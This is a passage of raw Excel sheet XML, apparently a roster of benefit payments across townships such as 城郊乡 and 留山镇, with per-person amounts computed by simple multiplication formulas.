        <v>城郊乡</v>
      </c>
      <c r="C1188" s="17" t="str">
        <f>C1187</f>
        <v>城郊乡</v>
      </c>
      <c r="D1188" s="16" t="s">
        <v>3175</v>
      </c>
      <c r="E1188" s="16" t="s">
        <v>3176</v>
      </c>
      <c r="F1188" s="17" t="str">
        <f>F1187</f>
        <v>4113210299</v>
      </c>
      <c r="G1188" s="17"/>
      <c r="H1188" s="17"/>
      <c r="I1188" s="17"/>
      <c r="J1188" s="17"/>
      <c r="K1188" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1189" customHeight="1" spans="1:11">
      <c r="A1189" s="16" t="s">
        <v>3177</v>
      </c>
      <c r="B1189" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1189" s="17" t="s">
        <v>3178</v>
      </c>
      <c r="D1189" s="17" t="s">
        <v>3179</v>
      </c>
      <c r="E1189" s="17" t="s">
        <v>3180</v>
      </c>
      <c r="F1189" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1189" s="17">
        <v>1</v>
      </c>
      <c r="H1189" s="18">
        <v>365</v>
      </c>
      <c r="I1189" s="17">
        <f>H1189*G1189</f>
        <v>365</v>
      </c>
      <c r="J1189" s="29">
        <v>45108</v>
      </c>
      <c r="K1189" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1190" customHeight="1" spans="1:11">
      <c r="A1190" s="16" t="s">
        <v>3181</v>
      </c>
      <c r="B1190" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1190" s="17" t="s">
        <v>3178</v>
      </c>
      <c r="D1190" s="17" t="s">
        <v>3182</v>
      </c>
      <c r="E1190" s="17" t="s">
        <v>3183</v>
      </c>
      <c r="F1190" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1190" s="17">
        <v>1</v>
      </c>
      <c r="H1190" s="18">
        <v>365</v>
      </c>
      <c r="I1190" s="17">
        <f>H1190*G1190</f>
        <v>365</v>
      </c>
      <c r="J1190" s="29">
        <v>45108</v>
      </c>
      <c r="K1190" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1191" customHeight="1" spans="1:11">
      <c r="A1191" s="16" t="s">
        <v>3184</v>
      </c>
      <c r="B1191" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1191" s="17" t="s">
        <v>3185</v>
      </c>
      <c r="D1191" s="17" t="s">
        <v>3186</v>
      </c>
      <c r="E1191" s="17" t="s">
        <v>1467</v>
      </c>
      <c r="F1191" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1191" s="17">
        <v>1</v>
      </c>
      <c r="H1191" s="18">
        <v>365</v>
      </c>
      <c r="I1191" s="17">
        <f>H1191*G1191</f>
        <v>365</v>
      </c>
      <c r="J1191" s="17">
        <v>45231</v>
      </c>
      <c r="K1191" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1192" customHeight="1" spans="1:11">
      <c r="A1192" s="16" t="s">
        <v>3187</v>
      </c>
      <c r="B1192" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1192" s="17" t="s">
        <v>3178</v>
      </c>
      <c r="D1192" s="17" t="s">
        <v>3188</v>
      </c>
      <c r="E1192" s="17" t="s">
        <v>3189</v>
      </c>
      <c r="F1192" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1192" s="17">
        <v>3</v>
      </c>
      <c r="H1192" s="18">
        <v>320</v>
      </c>
      <c r="I1192" s="17">
        <f>H1192*G1192</f>
        <v>960</v>
      </c>
      <c r="J1192" s="29">
        <v>45108</v>
      </c>
      <c r="K1192" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1193" customHeight="1" spans="1:11">
      <c r="A1193" s="16" t="s">
        <v>3190</v>
      </c>
      <c r="B1193" s="17" t="str">
        <f>B1192</f>
        <v>城郊乡</v>
      </c>
      <c r="C1193" s="17" t="str">
        <f>C1192</f>
        <v>城郊校委会</v>
      </c>
      <c r="D1193" s="16" t="s">
        <v>3191</v>
      </c>
      <c r="E1193" s="17" t="s">
        <v>3192</v>
      </c>
      <c r="F1193" s="17" t="str">
        <f>F1192</f>
        <v>4113210299</v>
      </c>
      <c r="G1193" s="17"/>
      <c r="H1193" s="17"/>
      <c r="I1193" s="17"/>
      <c r="J1193" s="17"/>
      <c r="K1193" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1194" customHeight="1" spans="1:11">
      <c r="A1194" s="16" t="s">
        <v>3193</v>
      </c>
      <c r="B1194" s="17" t="str">
        <f>B1193</f>
        <v>城郊乡</v>
      </c>
      <c r="C1194" s="17" t="str">
        <f>C1193</f>
        <v>城郊校委会</v>
      </c>
      <c r="D1194" s="16" t="s">
        <v>3194</v>
      </c>
      <c r="E1194" s="23" t="s">
        <v>3195</v>
      </c>
      <c r="F1194" s="17" t="str">
        <f>F1193</f>
        <v>4113210299</v>
      </c>
      <c r="G1194" s="17"/>
      <c r="H1194" s="17"/>
      <c r="I1194" s="17"/>
      <c r="J1194" s="17"/>
      <c r="K1194" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1195" customHeight="1" spans="1:11">
      <c r="A1195" s="16" t="s">
        <v>3196</v>
      </c>
      <c r="B1195" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1195" s="17" t="s">
        <v>3197</v>
      </c>
      <c r="D1195" s="17" t="s">
        <v>3198</v>
      </c>
      <c r="E1195" s="17" t="s">
        <v>3199</v>
      </c>
      <c r="F1195" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1195" s="17">
        <v>1</v>
      </c>
      <c r="H1195" s="18">
        <v>365</v>
      </c>
      <c r="I1195" s="17">
        <f>H1195*G1195</f>
        <v>365</v>
      </c>
      <c r="J1195" s="17">
        <v>45261</v>
      </c>
      <c r="K1195" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1196" customHeight="1" spans="1:11">
      <c r="A1196" s="16" t="s">
        <v>3200</v>
      </c>
      <c r="B1196" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1196" s="17" t="s">
        <v>3201</v>
      </c>
      <c r="D1196" s="17" t="s">
        <v>1828</v>
      </c>
      <c r="E1196" s="17" t="s">
        <v>3131</v>
      </c>
      <c r="F1196" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1196" s="17">
        <v>1</v>
      </c>
      <c r="H1196" s="18">
        <v>365</v>
      </c>
      <c r="I1196" s="17">
        <f>H1196*G1196</f>
        <v>365</v>
      </c>
      <c r="J1196" s="29">
        <v>45108</v>
      </c>
      <c r="K1196" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1197" customHeight="1" spans="1:11">
      <c r="A1197" s="16" t="s">
        <v>3202</v>
      </c>
      <c r="B1197" s="17" t="s">
        <v>3122</v>
      </c>
      <c r="C1197" s="17" t="s">
        <v>3201</v>
      </c>
      <c r="D1197" s="17" t="s">
        <v>3203</v>
      </c>
      <c r="E1197" s="17" t="s">
        <v>3204</v>
      </c>
      <c r="F1197" s="17" t="s">
        <v>3125</v>
      </c>
      <c r="G1197" s="17">
        <v>1</v>
      </c>
      <c r="H1197" s="18">
        <v>365</v>
      </c>
      <c r="I1197" s="17">
        <f>H1197*G1197</f>
        <v>365</v>
      </c>
      <c r="J1197" s="29">
        <v>45108</v>
      </c>
      <c r="K1197" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1198" customHeight="1" spans="1:11">
      <c r="A1198" s="16" t="s">
        <v>3205</v>
      </c>
      <c r="B1198" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1198" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1198" s="17" t="s">
        <v>3207</v>
      </c>
      <c r="E1198" s="17" t="s">
        <v>3208</v>
      </c>
      <c r="F1198" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1198" s="17">
        <v>2</v>
      </c>
      <c r="H1198" s="18">
        <v>325</v>
      </c>
      <c r="I1198" s="17">
        <f>H1198*G1198</f>
        <v>650</v>
      </c>
      <c r="J1198" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1198" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1199" customHeight="1" spans="1:11">
      <c r="A1199" s="16" t="s">
        <v>3209</v>
      </c>
      <c r="B1199" s="17" t="str">
        <f>B1198</f>
        <v>留山镇</v>
      </c>
      <c r="C1199" s="17" t="str">
        <f>C1198</f>
        <v>留山镇</v>
      </c>
      <c r="D1199" s="16" t="s">
        <v>3210</v>
      </c>
      <c r="E1199" s="16" t="s">
        <v>3211</v>
      </c>
      <c r="F1199" s="17">
        <f>F1198</f>
        <v>4113210399</v>
      </c>
      <c r="G1199" s="17"/>
      <c r="H1199" s="17"/>
      <c r="I1199" s="17"/>
      <c r="J1199" s="17"/>
      <c r="K1199" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1200" customHeight="1" spans="1:11">
      <c r="A1200" s="16" t="s">
        <v>3212</v>
      </c>
      <c r="B1200" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1200" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1200" s="17" t="s">
        <v>3213</v>
      </c>
      <c r="E1200" s="17" t="s">
        <v>3214</v>
      </c>
      <c r="F1200" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1200" s="17">
        <v>1</v>
      </c>
      <c r="H1200" s="18">
        <v>365</v>
      </c>
      <c r="I1200" s="17">
        <f>H1200*G1200</f>
        <v>365</v>
      </c>
      <c r="J1200" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1200" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1201" customHeight="1" spans="1:11">
      <c r="A1201" s="16" t="s">
        <v>3215</v>
      </c>
      <c r="B1201" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1201" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1201" s="17" t="s">
        <v>3216</v>
      </c>
      <c r="E1201" s="17" t="s">
        <v>3217</v>
      </c>
      <c r="F1201" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1201" s="17">
        <v>2</v>
      </c>
      <c r="H1201" s="18">
        <v>325</v>
      </c>
      <c r="I1201" s="17">
        <f>H1201*G1201</f>
        <v>650</v>
      </c>
      <c r="J1201" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1201" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1202" customHeight="1" spans="1:11">
      <c r="A1202" s="16" t="s">
        <v>3218</v>
      </c>
      <c r="B1202" s="17" t="str">
        <f>B1201</f>
        <v>留山镇</v>
      </c>
      <c r="C1202" s="17" t="str">
        <f>C1201</f>
        <v>留山镇</v>
      </c>
      <c r="D1202" s="16" t="s">
        <v>3219</v>
      </c>
      <c r="E1202" s="16" t="s">
        <v>3220</v>
      </c>
      <c r="F1202" s="17">
        <f>F1201</f>
        <v>4113210399</v>
      </c>
      <c r="G1202" s="17"/>
      <c r="H1202" s="17"/>
      <c r="I1202" s="17"/>
      <c r="J1202" s="17"/>
      <c r="K1202" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1203" customHeight="1" spans="1:11">
      <c r="A1203" s="16" t="s">
        <v>3221</v>
      </c>
      <c r="B1203" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1203" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1203" s="17" t="s">
        <v>3222</v>
      </c>
      <c r="E1203" s="17" t="s">
        <v>3223</v>
      </c>
      <c r="F1203" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1203" s="17">
        <v>1</v>
      </c>
      <c r="H1203" s="18">
        <v>365</v>
      </c>
      <c r="I1203" s="17">
        <f>H1203*G1203</f>
        <v>365</v>
      </c>
      <c r="J1203" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1203" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1204" customHeight="1" spans="1:11">
      <c r="A1204" s="16" t="s">
        <v>3224</v>
      </c>
      <c r="B1204" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1204" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1204" s="17" t="s">
        <v>3225</v>
      </c>
      <c r="E1204" s="17" t="s">
        <v>3226</v>
      </c>
      <c r="F1204" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1204" s="17">
        <v>2</v>
      </c>
      <c r="H1204" s="18">
        <v>325</v>
      </c>
      <c r="I1204" s="17">
        <f>H1204*G1204</f>
        <v>650</v>
      </c>
      <c r="J1204" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1204" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1205" customHeight="1" spans="1:11">
      <c r="A1205" s="16" t="s">
        <v>3227</v>
      </c>
      <c r="B1205" s="17" t="str">
        <f>B1204</f>
        <v>留山镇</v>
      </c>
      <c r="C1205" s="17" t="str">
        <f>C1204</f>
        <v>留山镇</v>
      </c>
      <c r="D1205" s="16" t="s">
        <v>3228</v>
      </c>
      <c r="E1205" s="16" t="s">
        <v>3229</v>
      </c>
      <c r="F1205" s="17">
        <f>F1204</f>
        <v>4113210399</v>
      </c>
      <c r="G1205" s="17"/>
      <c r="H1205" s="17"/>
      <c r="I1205" s="17"/>
      <c r="J1205" s="17"/>
      <c r="K1205" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1206" customHeight="1" spans="1:11">
      <c r="A1206" s="16" t="s">
        <v>3230</v>
      </c>
      <c r="B1206" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1206" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1206" s="17" t="s">
        <v>3231</v>
      </c>
      <c r="E1206" s="17" t="s">
        <v>3220</v>
      </c>
      <c r="F1206" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1206" s="17">
        <v>1</v>
      </c>
      <c r="H1206" s="18">
        <v>365</v>
      </c>
      <c r="I1206" s="17">
        <f>H1206*G1206</f>
        <v>365</v>
      </c>
      <c r="J1206" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1206" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1207" customHeight="1" spans="1:11">
      <c r="A1207" s="16" t="s">
        <v>3232</v>
      </c>
      <c r="B1207" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1207" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1207" s="17" t="s">
        <v>3233</v>
      </c>
      <c r="E1207" s="17" t="s">
        <v>3234</v>
      </c>
      <c r="F1207" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1207" s="17">
        <v>1</v>
      </c>
      <c r="H1207" s="18">
        <v>365</v>
      </c>
      <c r="I1207" s="17">
        <f>H1207*G1207</f>
        <v>365</v>
      </c>
      <c r="J1207" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1207" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1208" customHeight="1" spans="1:11">
      <c r="A1208" s="16" t="s">
        <v>3235</v>
      </c>
      <c r="B1208" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1208" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1208" s="17" t="s">
        <v>3236</v>
      </c>
      <c r="E1208" s="17" t="s">
        <v>3223</v>
      </c>
      <c r="F1208" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1208" s="17">
        <v>1</v>
      </c>
      <c r="H1208" s="18">
        <v>365</v>
      </c>
      <c r="I1208" s="17">
        <f>H1208*G1208</f>
        <v>365</v>
      </c>
      <c r="J1208" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1208" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1209" customHeight="1" spans="1:11">
      <c r="A1209" s="16" t="s">
        <v>3237</v>
      </c>
      <c r="B1209" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1209" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1209" s="17" t="s">
        <v>3238</v>
      </c>
      <c r="E1209" s="17" t="s">
        <v>3239</v>
      </c>
      <c r="F1209" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1209" s="17">
        <v>2</v>
      </c>
      <c r="H1209" s="18">
        <v>325</v>
      </c>
      <c r="I1209" s="17">
        <f>H1209*G1209</f>
        <v>650</v>
      </c>
      <c r="J1209" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1209" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1210" customHeight="1" spans="1:11">
      <c r="A1210" s="16" t="s">
        <v>3240</v>
      </c>
      <c r="B1210" s="17" t="str">
        <f>B1209</f>
        <v>留山镇</v>
      </c>
      <c r="C1210" s="17" t="str">
        <f>C1209</f>
        <v>留山镇</v>
      </c>
      <c r="D1210" s="16" t="s">
        <v>3241</v>
      </c>
      <c r="E1210" s="16" t="s">
        <v>3242</v>
      </c>
      <c r="F1210" s="17">
        <f>F1209</f>
        <v>4113210399</v>
      </c>
      <c r="G1210" s="17"/>
      <c r="H1210" s="17"/>
      <c r="I1210" s="17"/>
      <c r="J1210" s="17"/>
      <c r="K1210" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1211" customHeight="1" spans="1:11">
      <c r="A1211" s="16" t="s">
        <v>3243</v>
      </c>
      <c r="B1211" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1211" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1211" s="17" t="s">
        <v>3244</v>
      </c>
      <c r="E1211" s="17" t="s">
        <v>3245</v>
      </c>
      <c r="F1211" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1211" s="17">
        <v>1</v>
      </c>
      <c r="H1211" s="18">
        <v>365</v>
      </c>
      <c r="I1211" s="17">
        <f>H1211*G1211</f>
        <v>365</v>
      </c>
      <c r="J1211" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1211" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1212" customHeight="1" spans="1:11">
      <c r="A1212" s="16" t="s">
        <v>3246</v>
      </c>
      <c r="B1212" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1212" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1212" s="17" t="s">
        <v>3247</v>
      </c>
      <c r="E1212" s="17" t="s">
        <v>3211</v>
      </c>
      <c r="F1212" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1212" s="17">
        <v>1</v>
      </c>
      <c r="H1212" s="18">
        <v>365</v>
      </c>
      <c r="I1212" s="17">
        <f>H1212*G1212</f>
        <v>365</v>
      </c>
      <c r="J1212" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1212" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1213" customHeight="1" spans="1:11">
      <c r="A1213" s="16" t="s">
        <v>3248</v>
      </c>
      <c r="B1213" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1213" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1213" s="17" t="s">
        <v>3249</v>
      </c>
      <c r="E1213" s="17" t="s">
        <v>3250</v>
      </c>
      <c r="F1213" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1213" s="17">
        <v>2</v>
      </c>
      <c r="H1213" s="18">
        <v>345</v>
      </c>
      <c r="I1213" s="17">
        <f>H1213*G1213</f>
        <v>690</v>
      </c>
      <c r="J1213" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1213" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1214" customHeight="1" spans="1:11">
      <c r="A1214" s="16" t="s">
        <v>3251</v>
      </c>
      <c r="B1214" s="17" t="str">
        <f>B1213</f>
        <v>留山镇</v>
      </c>
      <c r="C1214" s="17" t="str">
        <f>C1213</f>
        <v>留山镇</v>
      </c>
      <c r="D1214" s="16" t="s">
        <v>3252</v>
      </c>
      <c r="E1214" s="16" t="s">
        <v>3253</v>
      </c>
      <c r="F1214" s="17">
        <f>F1213</f>
        <v>4113210399</v>
      </c>
      <c r="G1214" s="17"/>
      <c r="H1214" s="17"/>
      <c r="I1214" s="17"/>
      <c r="J1214" s="17"/>
      <c r="K1214" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1215" customHeight="1" spans="1:11">
      <c r="A1215" s="16" t="s">
        <v>3254</v>
      </c>
      <c r="B1215" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1215" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1215" s="17" t="s">
        <v>3255</v>
      </c>
      <c r="E1215" s="17" t="s">
        <v>3256</v>
      </c>
      <c r="F1215" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1215" s="17">
        <v>1</v>
      </c>
      <c r="H1215" s="18">
        <v>365</v>
      </c>
      <c r="I1215" s="17">
        <f>H1215*G1215</f>
        <v>365</v>
      </c>
      <c r="J1215" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1215" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1216" customHeight="1" spans="1:11">
      <c r="A1216" s="16" t="s">
        <v>3257</v>
      </c>
      <c r="B1216" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1216" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1216" s="17" t="s">
        <v>3258</v>
      </c>
      <c r="E1216" s="17" t="s">
        <v>3259</v>
      </c>
      <c r="F1216" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1216" s="17">
        <v>1</v>
      </c>
      <c r="H1216" s="18">
        <v>365</v>
      </c>
      <c r="I1216" s="17">
        <f>H1216*G1216</f>
        <v>365</v>
      </c>
      <c r="J1216" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1216" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1217" customHeight="1" spans="1:11">
      <c r="A1217" s="16" t="s">
        <v>3260</v>
      </c>
      <c r="B1217" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1217" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1217" s="17" t="s">
        <v>3261</v>
      </c>
      <c r="E1217" s="17" t="s">
        <v>3262</v>
      </c>
      <c r="F1217" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1217" s="17">
        <v>2</v>
      </c>
      <c r="H1217" s="18">
        <v>325</v>
      </c>
      <c r="I1217" s="17">
        <f>H1217*G1217</f>
        <v>650</v>
      </c>
      <c r="J1217" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1217" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1218" customHeight="1" spans="1:11">
      <c r="A1218" s="16" t="s">
        <v>3263</v>
      </c>
      <c r="B1218" s="17" t="str">
        <f>B1217</f>
        <v>留山镇</v>
      </c>
      <c r="C1218" s="17" t="str">
        <f>C1217</f>
        <v>留山镇</v>
      </c>
      <c r="D1218" s="41" t="s">
        <v>3264</v>
      </c>
      <c r="E1218" s="42" t="s">
        <v>3265</v>
      </c>
      <c r="F1218" s="17">
        <f>F1217</f>
        <v>4113210399</v>
      </c>
      <c r="G1218" s="17"/>
      <c r="H1218" s="17"/>
      <c r="I1218" s="17"/>
      <c r="J1218" s="17"/>
      <c r="K1218" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1219" customHeight="1" spans="1:11">
      <c r="A1219" s="16" t="s">
        <v>3266</v>
      </c>
      <c r="B1219" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1219" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1219" s="17" t="s">
        <v>3267</v>
      </c>
      <c r="E1219" s="17" t="s">
        <v>3268</v>
      </c>
      <c r="F1219" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1219" s="17">
        <v>2</v>
      </c>
      <c r="H1219" s="18">
        <v>325</v>
      </c>
      <c r="I1219" s="17">
        <f>H1219*G1219</f>
        <v>650</v>
      </c>
      <c r="J1219" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1219" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1220" customHeight="1" spans="1:11">
      <c r="A1220" s="16" t="s">
        <v>3269</v>
      </c>
      <c r="B1220" s="17" t="str">
        <f>B1219</f>
        <v>留山镇</v>
      </c>
      <c r="C1220" s="17" t="str">
        <f>C1219</f>
        <v>留山镇</v>
      </c>
      <c r="D1220" s="16" t="s">
        <v>3270</v>
      </c>
      <c r="E1220" s="16" t="s">
        <v>3271</v>
      </c>
      <c r="F1220" s="17">
        <f>F1219</f>
        <v>4113210399</v>
      </c>
      <c r="G1220" s="17"/>
      <c r="H1220" s="17"/>
      <c r="I1220" s="17"/>
      <c r="J1220" s="17"/>
      <c r="K1220" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1221" customHeight="1" spans="1:11">
      <c r="A1221" s="16" t="s">
        <v>3272</v>
      </c>
      <c r="B1221" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1221" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1221" s="17" t="s">
        <v>3273</v>
      </c>
      <c r="E1221" s="17" t="s">
        <v>3274</v>
      </c>
      <c r="F1221" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1221" s="17">
        <v>2</v>
      </c>
      <c r="H1221" s="18">
        <v>325</v>
      </c>
      <c r="I1221" s="17">
        <f>H1221*G1221</f>
        <v>650</v>
      </c>
      <c r="J1221" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1221" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1222" customHeight="1" spans="1:11">
      <c r="A1222" s="16" t="s">
        <v>3275</v>
      </c>
      <c r="B1222" s="17" t="str">
        <f>B1221</f>
        <v>留山镇</v>
      </c>
      <c r="C1222" s="17" t="str">
        <f>C1221</f>
        <v>留山镇</v>
      </c>
      <c r="D1222" s="16" t="s">
        <v>3276</v>
      </c>
      <c r="E1222" s="16" t="s">
        <v>3277</v>
      </c>
      <c r="F1222" s="17">
        <f>F1221</f>
        <v>4113210399</v>
      </c>
      <c r="G1222" s="17"/>
      <c r="H1222" s="17"/>
      <c r="I1222" s="17"/>
      <c r="J1222" s="17"/>
      <c r="K1222" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1223" customHeight="1" spans="1:11">
      <c r="A1223" s="16" t="s">
        <v>3278</v>
      </c>
      <c r="B1223" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1223" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1223" s="17" t="s">
        <v>3279</v>
      </c>
      <c r="E1223" s="17" t="s">
        <v>3280</v>
      </c>
      <c r="F1223" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1223" s="17">
        <v>2</v>
      </c>
      <c r="H1223" s="18">
        <v>325</v>
      </c>
      <c r="I1223" s="17">
        <f>H1223*G1223</f>
        <v>650</v>
      </c>
      <c r="J1223" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1223" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1224" customHeight="1" spans="1:11">
      <c r="A1224" s="16" t="s">
        <v>3281</v>
      </c>
      <c r="B1224" s="17" t="str">
        <f>B1223</f>
        <v>留山镇</v>
      </c>
      <c r="C1224" s="17" t="str">
        <f>C1223</f>
        <v>留山镇</v>
      </c>
      <c r="D1224" s="16" t="s">
        <v>3282</v>
      </c>
      <c r="E1224" s="16" t="s">
        <v>3283</v>
      </c>
      <c r="F1224" s="17">
        <f>F1223</f>
        <v>4113210399</v>
      </c>
      <c r="G1224" s="17"/>
      <c r="H1224" s="17"/>
      <c r="I1224" s="17"/>
      <c r="J1224" s="17"/>
      <c r="K1224" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1225" customHeight="1" spans="1:11">
      <c r="A1225" s="16" t="s">
        <v>3284</v>
      </c>
      <c r="B1225" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1225" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1225" s="17" t="s">
        <v>3285</v>
      </c>
      <c r="E1225" s="17" t="s">
        <v>3286</v>
      </c>
      <c r="F1225" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1225" s="17">
        <v>2</v>
      </c>
      <c r="H1225" s="18">
        <v>325</v>
      </c>
      <c r="I1225" s="17">
        <f>H1225*G1225</f>
        <v>650</v>
      </c>
      <c r="J1225" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1225" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1226" customHeight="1" spans="1:11">
      <c r="A1226" s="16" t="s">
        <v>3287</v>
      </c>
      <c r="B1226" s="17" t="str">
        <f>B1225</f>
        <v>留山镇</v>
      </c>
      <c r="C1226" s="17" t="str">
        <f>C1225</f>
        <v>留山镇</v>
      </c>
      <c r="D1226" s="16" t="s">
        <v>3288</v>
      </c>
      <c r="E1226" s="16" t="s">
        <v>3289</v>
      </c>
      <c r="F1226" s="17">
        <f>F1225</f>
        <v>4113210399</v>
      </c>
      <c r="G1226" s="17"/>
      <c r="H1226" s="17"/>
      <c r="I1226" s="17"/>
      <c r="J1226" s="17"/>
      <c r="K1226" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1227" customHeight="1" spans="1:11">
      <c r="A1227" s="16" t="s">
        <v>3290</v>
      </c>
      <c r="B1227" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1227" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1227" s="17" t="s">
        <v>3291</v>
      </c>
      <c r="E1227" s="17" t="s">
        <v>3292</v>
      </c>
      <c r="F1227" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1227" s="17">
        <v>2</v>
      </c>
      <c r="H1227" s="18">
        <v>325</v>
      </c>
      <c r="I1227" s="17">
        <f>H1227*G1227</f>
        <v>650</v>
      </c>
      <c r="J1227" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1227" s="17" t="s">
